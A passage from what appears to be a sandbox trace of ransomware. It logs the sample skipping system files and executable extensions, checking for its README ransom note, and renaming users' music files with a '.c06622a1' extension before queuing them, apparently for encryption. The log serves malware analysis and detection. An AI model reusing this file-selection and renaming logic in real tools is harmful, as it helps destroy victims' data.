_Str2="BET3vPa5NoXZqsdKFh.m4a") returned 10 [0150.630] wcslen (_String="bootsect.bak") returned 0xc [0150.630] _wcsicmp (_Str1="desktop.ini", _Str2="BET3vPa5NoXZqsdKFh.m4a") returned 2 [0150.630] wcslen (_String="desktop.ini") returned 0xb [0150.630] _wcsicmp (_Str1="iconcache.db", _Str2="BET3vPa5NoXZqsdKFh.m4a") returned 7 [0150.630] wcslen (_String="iconcache.db") returned 0xc [0150.630] _wcsicmp (_Str1="ntldr", _Str2="BET3vPa5NoXZqsdKFh.m4a") returned 12 [0150.630] wcslen (_String="ntldr") returned 0x5 [0150.630] _wcsicmp (_Str1="ntuser.dat", _Str2="BET3vPa5NoXZqsdKFh.m4a") returned 12 [0150.630] wcslen (_String="ntuser.dat") returned 0xa [0150.630] _wcsicmp (_Str1="ntuser.dat.log", _Str2="BET3vPa5NoXZqsdKFh.m4a") returned 12 [0150.630] wcslen (_String="ntuser.dat.log") returned 0xe [0150.630] _wcsicmp (_Str1="ntuser.ini", _Str2="BET3vPa5NoXZqsdKFh.m4a") returned 12 [0150.630] wcslen (_String="ntuser.ini") returned 0xa [0150.630] _wcsicmp (_Str1="thumbs.db", _Str2="BET3vPa5NoXZqsdKFh.m4a") returned 18 [0150.630] wcslen (_String="thumbs.db") returned 0x9 [0150.630] _wcsicmp (_Str1="386", _Str2="m4a") returned -58 [0150.630] wcslen (_String="386") returned 0x3 [0150.630] _wcsicmp (_Str1="adv", _Str2="m4a") returned -12 [0150.631] wcslen (_String="adv") returned 0x3 [0150.631] _wcsicmp (_Str1="ani", _Str2="m4a") returned -12 [0150.631] wcslen (_String="ani") returned 0x3 [0150.631] _wcsicmp (_Str1="bat", _Str2="m4a") returned -11 [0150.631] wcslen (_String="bat") returned 0x3 [0150.631] _wcsicmp (_Str1="bin", _Str2="m4a") returned -11 [0150.631] wcslen (_String="bin") returned 0x3 [0150.631] _wcsicmp (_Str1="cab", _Str2="m4a") returned -10 [0150.631] wcslen (_String="cab") returned 0x3 [0150.631] _wcsicmp (_Str1="cmd", _Str2="m4a") returned -10 [0150.631] wcslen (_String="cmd") returned 0x3 [0150.631] _wcsicmp (_Str1="com", _Str2="m4a") returned -10 [0150.631] wcslen (_String="com") returned 0x3 [0150.631] _wcsicmp (_Str1="cpl", _Str2="m4a") returned -10 [0150.631] wcslen (_String="cpl") returned 0x3 [0150.631] _wcsicmp (_Str1="cur", _Str2="m4a") returned -10 [0150.631] wcslen (_String="cur") returned 0x3 [0150.631] _wcsicmp (_Str1="deskthemepack", _Str2="m4a") returned -9 [0150.631] wcslen (_String="deskthemepack") returned 0xd [0150.631] _wcsicmp (_Str1="diagcab", _Str2="m4a") returned -9 [0150.631] wcslen (_String="diagcab") returned 0x7 [0150.631] _wcsicmp (_Str1="diagcfg", _Str2="m4a") returned -9 [0150.631] wcslen (_String="diagcfg") returned 0x7 [0150.631] _wcsicmp (_Str1="diagpkg", _Str2="m4a") returned -9 [0150.631] wcslen (_String="diagpkg") returned 0x7 [0150.631] _wcsicmp (_Str1="dll", _Str2="m4a") returned -9 [0150.631] wcslen (_String="dll") returned 0x3 [0150.631] _wcsicmp (_Str1="drv", _Str2="m4a") returned -9 [0150.631] wcslen (_String="drv") returned 0x3 [0150.631] _wcsicmp (_Str1="exe", _Str2="m4a") returned -8 [0150.631] wcslen (_String="exe") returned 0x3 [0150.631] _wcsicmp (_Str1="hlp", _Str2="m4a") returned -5 [0150.631] wcslen (_String="hlp") returned 0x3 [0150.631] _wcsicmp (_Str1="icl", _Str2="m4a") returned -4 [0150.631] wcslen (_String="icl") returned 0x3 [0150.631] _wcsicmp (_Str1="icns", _Str2="m4a") returned -4 [0150.632] wcslen (_String="icns") returned 0x4 [0150.632] _wcsicmp (_Str1="ico", _Str2="m4a") returned -4 [0150.632] wcslen (_String="ico") returned 0x3 [0150.632] _wcsicmp (_Str1="ics", _Str2="m4a") returned -4 [0150.632] wcslen (_String="ics") returned 0x3 [0150.632] _wcsicmp (_Str1="idx", _Str2="m4a") returned -4 [0150.632] wcslen (_String="idx") returned 0x3 [0150.632] _wcsicmp (_Str1="ldf", _Str2="m4a") returned -1 [0150.632] wcslen (_String="ldf") returned 0x3 [0150.632] _wcsicmp (_Str1="lnk", _Str2="m4a") returned -1 [0150.632] wcslen (_String="lnk") returned 0x3 [0150.632] _wcsicmp (_Str1="mod", _Str2="m4a") returned 59 [0150.632] wcslen (_String="mod") returned 0x3 [0150.632] _wcsicmp (_Str1="mpa", _Str2="m4a") returned 60 [0150.632] wcslen (_String="mpa") returned 0x3 [0150.632] _wcsicmp (_Str1="msc", _Str2="m4a") returned 63 [0150.632] wcslen (_String="msc") returned 0x3 [0150.632] _wcsicmp (_Str1="msp", _Str2="m4a") returned 63 [0150.632] wcslen (_String="msp") returned 0x3 [0150.632] _wcsicmp (_Str1="msstyles", _Str2="m4a") returned 63 [0150.632] wcslen (_String="msstyles") returned 0x8 [0150.632] _wcsicmp (_Str1="msu", _Str2="m4a") returned 63 [0150.632] wcslen (_String="msu") returned 0x3 [0150.632] _wcsicmp (_Str1="nls", _Str2="m4a") returned 1 [0150.632] wcslen (_String="nls") returned 0x3 [0150.632] _wcsicmp (_Str1="nomedia", _Str2="m4a") returned 1 [0150.632] wcslen (_String="nomedia") returned 0x7 [0150.632] _wcsicmp (_Str1="ocx", _Str2="m4a") returned 2 [0150.632] wcslen (_String="ocx") returned 0x3 [0150.632] _wcsicmp (_Str1="prf", _Str2="m4a") returned 3 [0150.632] wcslen (_String="prf") returned 0x3 [0150.632] _wcsicmp (_Str1="ps1", _Str2="m4a") returned 3 [0150.633] wcslen (_String="ps1") returned 0x3 [0150.633] _wcsicmp (_Str1="rom", _Str2="m4a") returned 5 [0150.633] wcslen (_String="rom") returned 0x3 [0150.633] _wcsicmp (_Str1="rtp", _Str2="m4a") returned 5 [0150.633] wcslen (_String="rtp") returned 0x3 [0150.633] _wcsicmp (_Str1="scr", _Str2="m4a") returned 6 [0150.633] wcslen (_String="scr") returned 0x3 [0150.633] _wcsicmp (_Str1="shs", _Str2="m4a") returned 6 [0150.633] wcslen (_String="shs") returned 0x3 [0150.633] _wcsicmp (_Str1="spl", _Str2="m4a") returned 6 [0150.633] wcslen (_String="spl") returned 0x3 [0150.633] _wcsicmp (_Str1="sys", _Str2="m4a") returned 6 [0150.633] wcslen (_String="sys") returned 0x3 [0150.633] _wcsicmp (_Str1="theme", _Str2="m4a") returned 7 [0150.633] wcslen (_String="theme") returned 0x5 [0150.633] _wcsicmp (_Str1="themepack", _Str2="m4a") returned 7 [0150.633] wcslen (_String="themepack") returned 0x9 [0150.633] _wcsicmp (_Str1="wpx", _Str2="m4a") returned 10 [0150.633] wcslen (_String="wpx") returned 0x3 [0150.633] _wcsicmp (_Str1="lock", _Str2="m4a") returned -1 [0150.633] wcslen (_String="lock") returned 0x4 [0150.633] _wcsicmp (_Str1="key", _Str2="m4a") returned -2 [0150.633] wcslen (_String="key") returned 0x3 [0150.633] _wcsicmp (_Str1="hta", _Str2="m4a") returned -5 [0150.633] wcslen (_String="hta") returned 0x3 [0150.633] _wcsicmp (_Str1="msi", _Str2="m4a") returned 63 [0150.633] wcslen (_String="msi") returned 0x3 [0150.633] _wcsicmp (_Str1="pdb", _Str2="m4a") returned 3 [0150.633] wcslen (_String="pdb") returned 0x3 [0150.633] _wcsicmp (_Str1="sql", _Str2="m4a") returned 6 [0150.633] wcslen (_String="sql") returned 0x3 [0150.633] _wcsicmp (_Str1="sqlite", _Str2="m4a") returned 6 [0150.633] wcslen (_String="sqlite") returned 0x6 [0150.633] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\4ytvpicjnjn\\sp6ae4nzco52agrkxd\\fv7b28tztm yqy0s\\jzvbokxj2eleedpia")) returned 0x10 [0150.633] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45900d8 [0150.633] wcscpy (in: _Dest=0x45900d8, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA" [0150.634] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA") returned 0x69 [0150.634] wcscpy (in: _Dest=0x45901ac, _Source="BET3vPa5NoXZqsdKFh.m4a" | out: _Dest="BET3vPa5NoXZqsdKFh.m4a") returned="BET3vPa5NoXZqsdKFh.m4a" [0150.634] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\BET3vPa5NoXZqsdKFh.m4a", dwFileAttributes=0x80) returned 1 [0150.634] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\BET3vPa5NoXZqsdKFh.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\4ytvpicjnjn\\sp6ae4nzco52agrkxd\\fv7b28tztm yqy0s\\jzvbokxj2eleedpia\\bet3vpa5noxzqsdkfh.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0150.634] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0150.634] ReadFile (in: hFile=0x640, lpBuffer=0x3fe174, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fe204, lpOverlapped=0x0 | out: lpBuffer=0x3fe174*, lpNumberOfBytesRead=0x3fe204*=0x90, lpOverlapped=0x0) returned 1 [0150.635] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3fe174, Length=0x80) returned 0xbc56cb7 [0150.635] RtlComputeCrc32 (PartialCrc=0x6cb7, Buffer=0x3fe174, Length=0x80) returned 0x8e1d98a3 [0150.635] RtlComputeCrc32 (PartialCrc=0x98a3, Buffer=0x3fe174, Length=0x80) returned 0x7db6c73e [0150.635] RtlComputeCrc32 (PartialCrc=0xc73e, Buffer=0x3fe174, Length=0x80) returned 0x4e210365 [0150.635] RtlComputeCrc32 (PartialCrc=0x365, Buffer=0x3fe174, Length=0x80) returned 0xabe3a2f7 [0150.635] CloseHandle (hObject=0x640) returned 1 [0150.635] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45a00e0 [0150.635] wcscpy (in: _Dest=0x45a00e0, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\BET3vPa5NoXZqsdKFh.m4a" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\BET3vPa5NoXZqsdKFh.m4a") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\BET3vPa5NoXZqsdKFh.m4a" [0150.635] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\BET3vPa5NoXZqsdKFh.m4a") returned 0x80 [0150.635] wcscpy (in: _Dest=0x45a01e0, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0150.635] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\BET3vPa5NoXZqsdKFh.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\4ytvpicjnjn\\sp6ae4nzco52agrkxd\\fv7b28tztm yqy0s\\jzvbokxj2eleedpia\\bet3vpa5noxzqsdkfh.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\BET3vPa5NoXZqsdKFh.m4a.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\4ytvpicjnjn\\sp6ae4nzco52agrkxd\\fv7b28tztm yqy0s\\jzvbokxj2eleedpia\\bet3vpa5noxzqsdkfh.m4a.c06622a1"), dwFlags=0x8) returned 1 [0150.637] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\BET3vPa5NoXZqsdKFh.m4a.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\4ytvpicjnjn\\sp6ae4nzco52agrkxd\\fv7b28tztm yqy0s\\jzvbokxj2eleedpia\\bet3vpa5noxzqsdkfh.m4a.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x640 [0150.637] CreateIoCompletionPort (FileHandle=0x640, ExistingCompletionPort=0x5e0, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5e0 [0150.637] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x4670020 [0150.643] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x208dff0b [0150.643] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x8237ec6 [0150.643] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x63cd33ee [0150.643] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x3bb81482 [0150.643] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x1bb7c38 [0150.643] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x5aa2c726 [0150.643] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x31493ae0 [0150.643] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0xb8da61a [0150.646] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x4670094, Length=0x80) returned 0x15366084 [0150.646] RtlComputeCrc32 (PartialCrc=0x6084, Buffer=0x4670094, Length=0x80) returned 0x7c28e96f [0150.646] RtlComputeCrc32 (PartialCrc=0xe96f, Buffer=0x4670094, Length=0x80) returned 0xeaed9210 [0150.646] RtlComputeCrc32 (PartialCrc=0x9210, Buffer=0x4670094, Length=0x80) returned 0x5712f75b [0150.646] RtlComputeCrc32 (PartialCrc=0xf75b, Buffer=0x4670094, Length=0x80) returned 0x65efca81 [0150.646] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4670020) returned 1 [0150.646] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45900d8) returned 1 [0150.646] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45a00e0) returned 1 [0150.646] FindNextFileW (in: hFindFile=0x2db8840, lpFindFileData=0x3fe2ec | out: lpFindFileData=0x3fe2ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdd8bafe0, ftCreationTime.dwHighDateTime=0x1d5e602, ftLastAccessTime.dwLowDateTime=0xde204b20, ftLastAccessTime.dwHighDateTime=0x1d5e196, ftLastWriteTime.dwLowDateTime=0xde204b20, ftLastWriteTime.dwHighDateTime=0x1d5e196, nFileSizeHigh=0x0, nFileSizeLow=0xee0f, dwReserved0=0x0, dwReserved1=0x0, cFileName="FwSXzR5XrIejo.m4a", cAlternateFileName="FWSXZR~1.M4A")) returned 1 [0150.646] _wcsicmp (_Str1="FwSXzR5XrIejo.m4a", _Str2="README.c06622a1.TXT") returned -12 [0150.646] wcsstr (_Str="FwSXzR5XrIejo.m4a", _SubStr="README") returned 0x0 [0150.646] _wcsicmp (_Str1="autorun.inf", _Str2="FwSXzR5XrIejo.m4a") returned -5 [0150.646] wcslen (_String="autorun.inf") returned 0xb [0150.646] _wcsicmp (_Str1="boot.ini", _Str2="FwSXzR5XrIejo.m4a") returned -4 [0150.646] wcslen (_String="boot.ini") returned 0x8 [0150.646] _wcsicmp (_Str1="bootfont.bin", _Str2="FwSXzR5XrIejo.m4a") returned -4 [0150.646] wcslen (_String="bootfont.bin") returned 0xc [0150.646] _wcsicmp (_Str1="bootsect.bak", _Str2="FwSXzR5XrIejo.m4a") returned -4 [0150.646] wcslen (_String="bootsect.bak") returned 0xc [0150.646] _wcsicmp (_Str1="desktop.ini", _Str2="FwSXzR5XrIejo.m4a") returned -2 [0150.646] wcslen (_String="desktop.ini") returned 0xb [0150.646] _wcsicmp (_Str1="iconcache.db", _Str2="FwSXzR5XrIejo.m4a") returned 3 [0150.646] wcslen (_String="iconcache.db") returned 0xc [0150.646] _wcsicmp (_Str1="ntldr", _Str2="FwSXzR5XrIejo.m4a") returned 8 [0150.646] wcslen (_String="ntldr") returned 0x5 [0150.647] _wcsicmp (_Str1="ntuser.dat", _Str2="FwSXzR5XrIejo.m4a") returned 8 [0150.647] wcslen (_String="ntuser.dat") returned 0xa [0150.647] _wcsicmp (_Str1="ntuser.dat.log", _Str2="FwSXzR5XrIejo.m4a") returned 8 [0150.647] wcslen (_String="ntuser.dat.log") returned 0xe [0150.647] _wcsicmp (_Str1="ntuser.ini", _Str2="FwSXzR5XrIejo.m4a") returned 8 [0150.647] wcslen (_String="ntuser.ini") returned 0xa [0150.647] _wcsicmp (_Str1="thumbs.db", _Str2="FwSXzR5XrIejo.m4a") returned 14 [0150.647] wcslen (_String="thumbs.db") returned 0x9 [0150.647] _wcsicmp (_Str1="386", _Str2="m4a") returned -58 [0150.647] wcslen (_String="386") returned 0x3 [0150.647] _wcsicmp (_Str1="adv", _Str2="m4a") returned -12 [0150.647] wcslen (_String="adv") returned 0x3 [0150.647] _wcsicmp (_Str1="ani", _Str2="m4a") returned -12 [0150.647] wcslen (_String="ani") returned 0x3 [0150.647] _wcsicmp (_Str1="bat", _Str2="m4a") returned -11 [0150.647] wcslen (_String="bat") returned 0x3 [0150.647] _wcsicmp (_Str1="bin", _Str2="m4a") returned -11 [0150.647] wcslen (_String="bin") returned 0x3 [0150.647] _wcsicmp (_Str1="cab", _Str2="m4a") returned -10 [0150.647] wcslen (_String="cab") returned 0x3 [0150.647] _wcsicmp (_Str1="cmd", _Str2="m4a") returned -10 [0150.647] wcslen (_String="cmd") returned 0x3 [0150.647] _wcsicmp (_Str1="com", _Str2="m4a") returned -10 [0150.647] wcslen (_String="com") returned 0x3 [0150.647] _wcsicmp (_Str1="cpl", _Str2="m4a") returned -10 [0150.647] wcslen (_String="cpl") returned 0x3 [0150.647] _wcsicmp (_Str1="cur", _Str2="m4a") returned -10 [0150.647] wcslen (_String="cur") returned 0x3 [0150.647] _wcsicmp (_Str1="deskthemepack", _Str2="m4a") returned -9 [0150.647] wcslen (_String="deskthemepack") returned 0xd [0150.647] _wcsicmp (_Str1="diagcab", _Str2="m4a") returned -9 [0150.647] wcslen (_String="diagcab") returned 0x7 [0150.647] _wcsicmp (_Str1="diagcfg", _Str2="m4a") returned -9 [0150.647] wcslen (_String="diagcfg") returned 0x7 [0150.647] _wcsicmp (_Str1="diagpkg", _Str2="m4a") returned -9 [0150.647] wcslen (_String="diagpkg") returned 0x7 [0150.647] _wcsicmp (_Str1="dll", _Str2="m4a") returned -9 [0150.647] wcslen (_String="dll") returned 0x3 [0150.648] _wcsicmp (_Str1="drv", _Str2="m4a") returned -9 [0150.648] wcslen (_String="drv") returned 0x3 [0150.648] _wcsicmp (_Str1="exe", _Str2="m4a") returned -8 [0150.648] wcslen (_String="exe") returned 0x3 [0150.648] _wcsicmp (_Str1="hlp", _Str2="m4a") returned -5 [0150.648] wcslen (_String="hlp") returned 0x3 [0150.648] _wcsicmp (_Str1="icl", _Str2="m4a") returned -4 [0150.648] wcslen (_String="icl") returned 0x3 [0150.648] _wcsicmp (_Str1="icns", _Str2="m4a") returned -4 [0150.648] wcslen (_String="icns") returned 0x4 [0150.648] _wcsicmp (_Str1="ico", _Str2="m4a") returned -4 [0150.648] wcslen (_String="ico") returned 0x3 [0150.648] _wcsicmp (_Str1="ics", _Str2="m4a") returned -4 [0150.648] wcslen (_String="ics") returned 0x3 [0150.648] _wcsicmp (_Str1="idx", _Str2="m4a") returned -4 [0150.648] wcslen (_String="idx") returned 0x3 [0150.648] _wcsicmp (_Str1="ldf", _Str2="m4a") returned -1 [0150.648] wcslen (_String="ldf") returned 0x3 [0150.648] _wcsicmp (_Str1="lnk", _Str2="m4a") returned -1 [0150.648] wcslen (_String="lnk") returned 0x3 [0150.648] _wcsicmp (_Str1="mod", _Str2="m4a") returned 59 [0150.648] wcslen (_String="mod") returned 0x3 [0150.648] _wcsicmp (_Str1="mpa", _Str2="m4a") returned 60 [0150.648] wcslen (_String="mpa") returned 0x3 [0150.648] _wcsicmp (_Str1="msc", _Str2="m4a") returned 63 [0150.649] wcslen (_String="msc") returned 0x3 [0150.649] _wcsicmp (_Str1="msp", _Str2="m4a") returned 63 [0150.649] wcslen (_String="msp") returned 0x3 [0150.649] _wcsicmp (_Str1="msstyles", _Str2="m4a") returned 63 [0150.649] wcslen (_String="msstyles") returned 0x8 [0150.649] _wcsicmp (_Str1="msu", _Str2="m4a") returned 63 [0150.649] wcslen (_String="msu") returned 0x3 [0150.649] _wcsicmp (_Str1="nls", _Str2="m4a") returned 1 [0150.649] wcslen (_String="nls") returned 0x3 [0150.649] _wcsicmp (_Str1="nomedia", _Str2="m4a") returned 1 [0150.649] wcslen (_String="nomedia") returned 0x7 [0150.649] _wcsicmp (_Str1="ocx", _Str2="m4a") returned 2 [0150.649] wcslen (_String="ocx") returned 0x3 [0150.649] _wcsicmp (_Str1="prf", _Str2="m4a") returned 3 [0150.649] wcslen (_String="prf") returned 0x3 [0150.649] _wcsicmp (_Str1="ps1", _Str2="m4a") returned 3 [0150.649] wcslen (_String="ps1") returned 0x3 [0150.649] _wcsicmp (_Str1="rom", _Str2="m4a") returned 5 [0150.649] wcslen (_String="rom") returned 0x3 [0150.649] _wcsicmp (_Str1="rtp", _Str2="m4a") returned 5 [0150.649] wcslen (_String="rtp") returned 0x3 [0150.649] _wcsicmp (_Str1="scr", _Str2="m4a") returned 6 [0150.649] wcslen (_String="scr") returned 0x3 [0150.649] _wcsicmp (_Str1="shs", _Str2="m4a") returned 6 [0150.649] wcslen (_String="shs") returned 0x3 [0150.649] _wcsicmp (_Str1="spl", _Str2="m4a") returned 6 [0150.649] wcslen (_String="spl") returned 0x3 [0150.649] _wcsicmp (_Str1="sys", _Str2="m4a") returned 6 [0150.649] wcslen (_String="sys") returned 0x3 [0150.649] _wcsicmp (_Str1="theme", _Str2="m4a") returned 7 [0150.649] wcslen (_String="theme") returned 0x5 [0150.649] _wcsicmp (_Str1="themepack", _Str2="m4a") returned 7 [0150.649] wcslen (_String="themepack") returned 0x9 [0150.649] _wcsicmp (_Str1="wpx", _Str2="m4a") returned 10 [0150.649] wcslen (_String="wpx") returned 0x3 [0150.649] _wcsicmp (_Str1="lock", _Str2="m4a") returned -1 [0150.649] wcslen (_String="lock") returned 0x4 [0150.649] _wcsicmp (_Str1="key", _Str2="m4a") returned -2 [0150.650] wcslen (_String="key") returned 0x3 [0150.650] _wcsicmp (_Str1="hta", _Str2="m4a") returned -5 [0150.650] wcslen (_String="hta") returned 0x3 [0150.650] _wcsicmp (_Str1="msi", _Str2="m4a") returned 63 [0150.650] wcslen (_String="msi") returned 0x3 [0150.650] _wcsicmp (_Str1="pdb", _Str2="m4a") returned 3 [0150.650] wcslen (_String="pdb") returned 0x3 [0150.650] _wcsicmp (_Str1="sql", _Str2="m4a") returned 6 [0150.650] wcslen (_String="sql") returned 0x3 [0150.650] _wcsicmp (_Str1="sqlite", _Str2="m4a") returned 6 [0150.650] wcslen (_String="sqlite") returned 0x6 [0150.650] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\4ytvpicjnjn\\sp6ae4nzco52agrkxd\\fv7b28tztm yqy0s\\jzvbokxj2eleedpia")) returned 0x10 [0150.650] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45900d8 [0150.650] wcscpy (in: _Dest=0x45900d8, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA" [0150.650] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA") returned 0x69 [0150.650] wcscpy (in: _Dest=0x45901ac, _Source="FwSXzR5XrIejo.m4a" | out: _Dest="FwSXzR5XrIejo.m4a") returned="FwSXzR5XrIejo.m4a" [0150.650] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\FwSXzR5XrIejo.m4a", dwFileAttributes=0x80) returned 1 [0150.650] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\FwSXzR5XrIejo.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\4ytvpicjnjn\\sp6ae4nzco52agrkxd\\fv7b28tztm yqy0s\\jzvbokxj2eleedpia\\fwsxzr5xriejo.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0150.650] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0150.650] ReadFile (in: hFile=0x61c, lpBuffer=0x3fe174, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fe204, lpOverlapped=0x0 | out: lpBuffer=0x3fe174*, lpNumberOfBytesRead=0x3fe204*=0x90, lpOverlapped=0x0) returned 1 [0150.652] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3fe174, Length=0x80) returned 0xf2eaca80 [0150.652] RtlComputeCrc32 (PartialCrc=0xca80, Buffer=0x3fe174, Length=0x80) returned 0xbbb7067b [0150.652] RtlComputeCrc32 (PartialCrc=0x67b, Buffer=0x3fe174, Length=0x80) returned 0xef99b180 [0150.652] RtlComputeCrc32 (PartialCrc=0xb180, Buffer=0x3fe174, Length=0x80) returned 0x28028a20 [0150.652] RtlComputeCrc32 (PartialCrc=0x8a20, Buffer=0x3fe174, Length=0x80) returned 0x89d75010 [0150.652] CloseHandle (hObject=0x61c) returned 1 [0150.652] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45a00e0 [0150.652] wcscpy (in: _Dest=0x45a00e0, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS 